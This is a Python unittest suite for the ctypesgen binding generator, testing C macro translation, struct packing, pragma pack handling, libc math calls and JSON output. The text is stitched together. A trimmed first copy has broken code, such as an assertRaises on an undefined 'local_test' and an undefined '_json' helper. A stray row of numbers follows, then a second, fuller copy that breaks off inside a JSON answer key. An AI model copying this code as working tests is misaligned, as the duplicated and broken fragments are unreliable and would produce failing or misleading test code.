(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#define A 1
#define B(x,y) x+y
#define C(a,b,c) a?b:c
#define funny(x) "funny" #x
#define multipler_macro(x,y) x*y
#define minus_macro(x,y) x-y
#define divide_macro(x,y) x/y
#define mod_macro(x,y) x%y
#define subcall_macro_simple(x) (A)
#define subcall_macro_simple_plus(x) (A) + (x)
#define subcall_macro_minus(x,y) minus_macro(x,y)
#define subcall_macro_minus_plus(x,y,z) (minus_macro(x,y)) + (z)
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
def test_macro_constant_int(self):
"""Tests from simple_macros.py
"""
module, json = self.module, self._json
self.assertEqual(module.A, 1)
self.assertEqual(json("A"), {"name": "A", "type": "macro", "value": "1"})
def test_macro_addition(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.B(2, 2), 4)
def test_macro_ternary_json(self):
"""Tests from simple_macros.py
"""
json = self._json
self.assertEqual(
json("C"),
{
"args": ["a", "b", "c"],
"body": "a and b or c",
"name": "C",
"type": "macro_function",
},
)
def test_macro_ternary_true(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.C(True, 1, 2), 1)
def test_macro_ternary_false(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.C(False, 1, 2), 2)
def test_macro_ternary_true_complex(self):
"""Test ?: with true, using values that can not be confused between True and 1
"""
module = self.module
self.assertEqual(module.C(True, 99, 100), 99)
def test_macro_ternary_false_complex(self):
"""Test ?: with false, using values that can not be confused between True and 1
"""
module = self.module
self.assertEqual(module.C(False, 99, 100), 100)
def test_macro_string_compose(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.funny("bunny"), "funnybunny")
def test_macro_string_compose_json(self):
"""Tests from simple_macros.py
"""
json = self._json
self.assertEqual(
json("funny"),
{"args": ["x"], "body": "('funny' + x)", "name": "funny", "type": "macro_function"},
)
def test_macro_subcall_simple(self):
"""Test use of a constant valued macro within a macro"""
module = self.module
self.assertEqual(module.subcall_macro_simple(2), 1)
def test_macro_subcall_simple_plus(self):
"""Test math with constant valued macro within a macro"""
module = self.module
self.assertEqual(module.subcall_macro_simple_plus(2), 1 + 2)
def test_macro_subcall_minus(self):
"""Test use of macro function within a macro"""
module = self.module
x, y = 2, 5
self.assertEqual(module.subcall_macro_minus(x, y), x - y)
def test_macro_subcall_minus_plus(self):
"""Test math with a macro function within a macro"""
module = self.module
x, y, z = 2, 5, 1
self.assertEqual(module.subcall_macro_minus_plus(x, y, z), (x - y) + z)
class StructuresTest(unittest.TestCase):
"""Based on structures.py
"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
NOTE: Very possibly, if you change this header string, you need to change the line
numbers in the JSON output test result below (in
test_struct_json).
"""
header_str = """
struct foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
struct __attribute__((packed)) packed_foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} foo_t;
typedef struct __attribute__((packed))
{
int a;
char b;
int c;
int d : 15;
int : 17;
} packed_foo_t;
#pragma pack(push, 4)
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} pragma_packed_foo_t;
#pragma pack(pop)
#pragma pack(push, thing1, 2)
#pragma pack(push, thing2, 4)
#pragma pack(pop)
#pragma pack(push, thing3, 8)
#pragma pack(push, thing4, 16)
#pragma pack(pop, thing3)
struct pragma_packed_foo2
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
#pragma pack(pop, thing1)
struct foo3
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef int Int;
typedef struct {
int Int;
} id_struct_t;
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
cleanup_json_src_paths(self.json)
def test_fields(self):
"""Test whether fields are built correctly.
"""
struct_foo = self.module.struct_foo
self.assertEqual(
struct_foo._fields_,
[
("a", ctypes.c_int),
("b", ctypes.c_char),
("c", ctypes.c_int),
("d", ctypes.c_int, 15),
("unnamed_1", ctypes.c_int, 17),
],
)
def test_pack(self):
"""Test whether gcc __attribute__((packed)) is interpreted correctly.
"""
unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
packed_size = compute_packed(1, [ctypes.c_int] * 3 + [ctypes.c_char])
struct_foo = self.module.struct_foo
struct_packed_foo = self.module.struct_packed_foo
foo_t = self.module.foo_t
packed_foo_t = self.module.packed_foo_t
self.assertEqual(getattr(struct_foo, "_pack_", 0), 0)
self.assertEqual(getattr(struct_packed_foo, "_pack_", 0), 1)
self.assertEqual(getattr(foo_t, "_pack_", 0), 0)
self.assertEqual(getattr(packed_foo_t, "_pack_", -1), 1)
self.assertEqual(ctypes.sizeof(struct_foo), unpacked_size)
self.assertEqual(ctypes.sizeof(foo_t), unpacked_size)
self.assertEqual(ctypes.sizeof(struct_packed_foo), packed_size)
self.assertEqual(ctypes.sizeof(packed_foo_t), packed_size)
def test_pragma_pack(self):
"""Test whether #pragma pack(...) is interpreted correctly.
"""
packed4_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
packed2_size = compute_packed(2, [ctypes.c_int] * 3 + [ctypes.c_char])
unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
pragma_packed_foo_t = self.module.pragma_packed_foo_t
struct_pragma_packed_foo2 = self.module.struct_pragma_packed_foo2
struct_foo3 = self.module.struct_foo3
self.assertEqual(getattr(pragma_packed_foo_t, "_pack_", 0), 4)
self.assertEqual(getattr(struct_pragma_packed_foo2, "_pack_", 0), 2)
self.assertEqual(getattr(struct_foo3, "_pack_", 0), 0)
self.assertEqual(ctypes.sizeof(pragma_packed_foo_t), packed4_size)
self.assertEqual(ctypes.sizeof(struct_pragma_packed_foo2), packed2_size)
self.assertEqual(ctypes.sizeof(struct_foo3), unpacked_size)
def test_typedef_vs_field_id(self):
"""Test whether local field identifier names can override external
typedef names.
"""
Int = self.module.Int
id_struct_t = self.module.id_struct_t
self.assertEqual(Int, ctypes.c_int)
self.assertEqual(id_struct_t._fields_, [("Int", ctypes.c_int)])
class MathTest(unittest.TestCase):
"""Based on math_functions.py"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#include <math.h>
#define sin_plus_y(x,y) (sin(x) + (y))
"""
if sys.platform == "win32":
# pick something from %windir%\system32\msvc*dll that include stdlib
libraries = ["msvcrt.dll"]
libraries = ["msvcrt"]
elif sys.platform.startswith("linux"):
libraries = ["libm.so.6"]
else:
libraries = ["libc"]
self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)
def test_sin(self):
"""Based on math_functions.py"""
module = self.module
self.assertEqual(module.sin(2), math.sin(2))
def test_sqrt(self):
"""Based on math_functions.py"""
module = self.module
self.assertEqual(module.sqrt(4), 2)
self.assertRaises(ctypes.ArgumentError, local_test)
def test_bad_args_string_not_number(self):
"""Based on math_functions.py"""
module = self.module
self.assertRaises(ctypes.ArgumentError, local_test)
def test_subcall_sin(self):
"""Test math with sin(x) in a macro"""
module = self.module
self.assertEqual(module.sin_plus_y(2, 1), math.sin(2) + 1)
class LongDoubleTest(unittest.TestCase):
"Test correct parsing and generation of 'long double' type"
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
struct foo
{
long double is_bar;
int a;
};
"""
self.module, _ = ctypesgentest.test(header_str) # , all_headers=True)
def test_longdouble_type(self):
"""Test is long double is correctly parsed"""
module = self.module
struct_foo = module.struct_foo
self.assertEqual(
struct_foo._fields_, [("is_bar", ctypes.c_longdouble), ("a", ctypes.c_int)]
)
class UncheckedTest(unittest.TestCase):
"""Fixing a bug in 1.0.0 - basic type returns of function pointers get treated as pointers"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
typedef int (*some_type_of_answer)(void*);
"""
self.module, self.output = ctypesgentest.test(header_str, all_headers=False)
def test_unchecked_prototype(self):
"""Test is function type marked UNCHECKED (function pointer returning int) is handled correctly"""
module = self.module
A = module.some_type_of_answer()
self.assertEqual(A.restype, ctypes.c_int)
self.assertEqual(A.argtypes, (ctypes.c_void_p,))
if __name__ == "__main__":
sys.exit(main())
| 35.260714 | 106 | 0.309696 | #!/usr/bin/env python3
# -*- coding: ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
"""Simple test suite using unittest.
By clach04 (Chris Clark).
Calling:
python test/testsuite.py
or
cd test
./testsuite.py
Could use any unitest compatible test runner (nose, etc.)
Aims to test for regressions. Where possible use stdlib to
avoid the need to compile C code.
Known to run clean with:
* 32bit Linux (python 2.5.2, 2.6)
* 32bit Windows XP (python 2.4, 2.5, 2.6.1)
"""
import sys
import os
import ctypes
import math
import unittest
import logging
from subprocess import Popen, PIPE
test_directory = os.path.abspath(os.path.dirname(__file__))
sys.path.append(test_directory)
sys.path.append(os.path.join(test_directory, os.pardir))
import ctypesgentest # TODO consider moving test() from ctypesgentest into this module
def cleanup_json_src_paths(json):
"""
JSON stores the path to some source items. These need to be genericized in
order for tests to succeed on all machines/user accounts.
"""
TYPES_W_PATHS = ["CtypesStruct", "CtypesEnum"]
for i in json:
if "ctype" in i and i["ctype"]["Klass"] in TYPES_W_PATHS:
i["ctype"]["src"][0] = "/some-path/temp.h"
def compare_json(test_instance, json, json_ans, verbose=False):
print_excess = False
try:
test_instance.assertEqual(len(json), len(json_ans))
except:
if verbose:
print(
"JSONs do not have same length: ",
len(json),
"generated vs",
len(json_ans),
"stored",
)
print_excess = True
else:
raise
# first fix paths that exist inside JSON to avoid user-specific paths:
for i, ith_json_ans in zip(json, json_ans):
try:
test_instance.assertEqual(i, ith_json_ans)
except:
if verbose:
print("\nFailed JSON for: ", i["name"])
print("GENERATED:\n", i, "\nANS:\n", ith_json_ans)
raise
if print_excess:
if len(json) > len(json_ans):
j, jlen, jlabel = json, len(json_ans), "generated"
else:
j, jlen, jlabel = json_ans, len(json), "stored"
import pprint
print("Excess JSON content from", jlabel, "content:")
pprint.pprint(j[jlen:])
def compute_packed(modulo, fields):
packs = [
(
modulo * int(ctypes.sizeof(f) / modulo)
+ modulo * (1 if (ctypes.sizeof(f) % modulo) else 0)
)
for f in fields
]
return sum(packs)
class StdlibTest(unittest.TestCase):
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = "#include <stdlib.h>\n"
if sys.platform == "win32":
# pick something from %windir%\system32\msvc*dll that include stdlib
libraries = ["msvcrt.dll"]
libraries = ["msvcrt"]
elif sys.platform.startswith("linux"):
libraries = ["libc.so.6"]
else:
libraries = ["libc"]
self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_getenv_returns_string(self):
"""Issue 8 - Regression for crash with 64 bit and bad strings on 32 bit.
See http://code.google.com/p/ctypesgen/issues/detail?id=8
Test that we get a valid (non-NULL, non-empty) string back
"""
module = self.module
if sys.platform == "win32":
# Check a variable that is already set
env_var_name = (
"USERNAME"
) # this is always set (as is windir, ProgramFiles, USERPROFILE, etc.)
expect_result = os.environ[env_var_name]
self.assertTrue(expect_result, "this should not be None or empty")
# reason for using an existing OS variable is that unless the
# MSVCRT dll imported is the exact same one that Python was
# built with you can't share structures, see
# http://msdn.microsoft.com/en-us/library/ms235460.aspx
# "Potential Errors Passing CRT Objects Across DLL Boundaries"
else:
env_var_name = "HELLO"
os.environ[env_var_name] = "WORLD" # This doesn't work under win32
expect_result = "WORLD"
result = str(module.getenv(env_var_name))
self.assertEqual(expect_result, result)
def test_getenv_returns_null(self):
"""Related to issue 8. Test getenv of unset variable.
"""
module = self.module
env_var_name = "NOT SET"
expect_result = None
try:
# ensure variable is not set, ignoring not set errors
del os.environ[env_var_name]
except KeyError:
pass
result = module.getenv(env_var_name)
self.assertEqual(expect_result, result)
class StdBoolTest(unittest.TestCase):
"Test correct parsing and generation of bool type"
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#include <stdbool.h>
struct foo
{
bool is_bar;
int a;
};
"""
self.module, _ = ctypesgentest.test(header_str) # , all_headers=True)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_stdbool_type(self):
"""Test is bool is correctly parsed"""
module = self.module
struct_foo = module.struct_foo
self.assertEqual(struct_foo._fields_, [("is_bar", ctypes.c_bool), ("a", ctypes.c_int)])
class SimpleMacrosTest(unittest.TestCase):
"""Based on simple_macros.py
"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#define A 1
#define B(x,y) x+y
#define C(a,b,c) a?b:c
#define funny(x) "funny" #x
#define multipler_macro(x,y) x*y
#define minus_macro(x,y) x-y
#define divide_macro(x,y) x/y
#define mod_macro(x,y) x%y
#define subcall_macro_simple(x) (A)
#define subcall_macro_simple_plus(x) (A) + (x)
#define subcall_macro_minus(x,y) minus_macro(x,y)
#define subcall_macro_minus_plus(x,y,z) (minus_macro(x,y)) + (z)
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
def _json(self, name):
for i in self.json:
if i["name"] == name:
return i
raise KeyError("Could not find JSON entry")
def tearDown(self):
del self.module, self.json
ctypesgentest.cleanup()
def test_macro_constant_int(self):
"""Tests from simple_macros.py
"""
module, json = self.module, self._json
self.assertEqual(module.A, 1)
self.assertEqual(json("A"), {"name": "A", "type": "macro", "value": "1"})
def test_macro_addition_json(self):
json = self._json
self.assertEqual(
json("B"),
{"args": ["x", "y"], "body": "(x + y)", "name": "B", "type": "macro_function"},
)
def test_macro_addition(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.B(2, 2), 4)
def test_macro_ternary_json(self):
"""Tests from simple_macros.py
"""
json = self._json
self.assertEqual(
json("C"),
{
"args": ["a", "b", "c"],
"body": "a and b or c",
"name": "C",
"type": "macro_function",
},
)
def test_macro_ternary_true(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.C(True, 1, 2), 1)
def test_macro_ternary_false(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.C(False, 1, 2), 2)
def test_macro_ternary_true_complex(self):
"""Test ?: with true, using values that can not be confused between True and 1
"""
module = self.module
self.assertEqual(module.C(True, 99, 100), 99)
def test_macro_ternary_false_complex(self):
"""Test ?: with false, using values that can not be confused between True and 1
"""
module = self.module
self.assertEqual(module.C(False, 99, 100), 100)
def test_macro_string_compose(self):
"""Tests from simple_macros.py
"""
module = self.module
self.assertEqual(module.funny("bunny"), "funnybunny")
def test_macro_string_compose_json(self):
"""Tests from simple_macros.py
"""
json = self._json
self.assertEqual(
json("funny"),
{"args": ["x"], "body": "('funny' + x)", "name": "funny", "type": "macro_function"},
)
def test_macro_math_multipler(self):
module = self.module
x, y = 2, 5
self.assertEqual(module.multipler_macro(x, y), x * y)
def test_macro_math_multiplier_json(self):
json = self._json
self.assertEqual(
json("multipler_macro"),
{
"args": ["x", "y"],
"body": "(x * y)",
"name": "multipler_macro",
"type": "macro_function",
},
)
def test_macro_math_minus(self):
module = self.module
x, y = 2, 5
self.assertEqual(module.minus_macro(x, y), x - y)
def test_macro_math_minus_json(self):
json = self._json
self.assertEqual(
json("minus_macro"),
{
"args": ["x", "y"],
"body": "(x - y)",
"name": "minus_macro",
"type": "macro_function",
},
)
def test_macro_math_divide(self):
module = self.module
x, y = 2, 5
self.assertEqual(module.divide_macro(x, y), x / y)
def test_macro_math_divide_json(self):
json = self._json
self.assertEqual(
json("divide_macro"),
{
"args": ["x", "y"],
"body": "(x / y)",
"name": "divide_macro",
"type": "macro_function",
},
)
def test_macro_math_mod(self):
module = self.module
x, y = 2, 5
self.assertEqual(module.mod_macro(x, y), x % y)
def test_macro_math_mod_json(self):
json = self._json
self.assertEqual(
json("mod_macro"),
{"args": ["x", "y"], "body": "(x % y)", "name": "mod_macro", "type": "macro_function"},
)
def test_macro_subcall_simple(self):
"""Test use of a constant valued macro within a macro"""
module = self.module
self.assertEqual(module.subcall_macro_simple(2), 1)
def test_macro_subcall_simple_json(self):
json = self._json
self.assertEqual(
json("subcall_macro_simple"),
{"args": ["x"], "body": "A", "name": "subcall_macro_simple", "type": "macro_function"},
)
def test_macro_subcall_simple_plus(self):
"""Test math with constant valued macro within a macro"""
module = self.module
self.assertEqual(module.subcall_macro_simple_plus(2), 1 + 2)
def test_macro_subcall_simple_plus_json(self):
json = self._json
self.assertEqual(
json("subcall_macro_simple_plus"),
{
"args": ["x"],
"body": "(A + x)",
"name": "subcall_macro_simple_plus",
"type": "macro_function",
},
)
def test_macro_subcall_minus(self):
"""Test use of macro function within a macro"""
module = self.module
x, y = 2, 5
self.assertEqual(module.subcall_macro_minus(x, y), x - y)
def test_macro_subcall_minus_json(self):
json = self._json
self.assertEqual(
json("subcall_macro_minus"),
{
"args": ["x", "y"],
"body": "(minus_macro (x, y))",
"name": "subcall_macro_minus",
"type": "macro_function",
},
)
def test_macro_subcall_minus_plus(self):
"""Test math with a macro function within a macro"""
module = self.module
x, y, z = 2, 5, 1
self.assertEqual(module.subcall_macro_minus_plus(x, y, z), (x - y) + z)
def test_macro_subcall_minus_plus_json(self):
json = self._json
self.assertEqual(
json("subcall_macro_minus_plus"),
{
"args": ["x", "y", "z"],
"body": "((minus_macro (x, y)) + z)",
"name": "subcall_macro_minus_plus",
"type": "macro_function",
},
)
class StructuresTest(unittest.TestCase):
"""Based on structures.py
"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
NOTE: Very possibly, if you change this header string, you need to change the line
numbers in the JSON output test result below (in
test_struct_json).
"""
header_str = """
struct foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
struct __attribute__((packed)) packed_foo
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} foo_t;
typedef struct __attribute__((packed))
{
int a;
char b;
int c;
int d : 15;
int : 17;
} packed_foo_t;
#pragma pack(push, 4)
typedef struct
{
int a;
char b;
int c;
int d : 15;
int : 17;
} pragma_packed_foo_t;
#pragma pack(pop)
#pragma pack(push, thing1, 2)
#pragma pack(push, thing2, 4)
#pragma pack(pop)
#pragma pack(push, thing3, 8)
#pragma pack(push, thing4, 16)
#pragma pack(pop, thing3)
struct pragma_packed_foo2
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
#pragma pack(pop, thing1)
struct foo3
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef int Int;
typedef struct {
int Int;
} id_struct_t;
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
cleanup_json_src_paths(self.json)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_struct_json(self):
json_ans = [
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "foo",
"type": "struct",
},
{
"attrib": {"packed": True},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "packed_foo",
"type": "struct",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_5",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 21],
"tag": "anon_5",
"variety": "struct",
},
"name": "foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_6",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True},
"src": ["/some-path/temp.h", 30],
"tag": "anon_6",
"variety": "struct",
},
"name": "packed_foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True, "aligned": [4]},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_7",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True, "aligned": [4]},
"src": ["/some-path/temp.h", 40],
"tag": "anon_7",
"variety": "struct",
},
"name": "pragma_packed_foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True, "aligned": [2]},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "pragma_packed_foo2",
"type": "struct",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
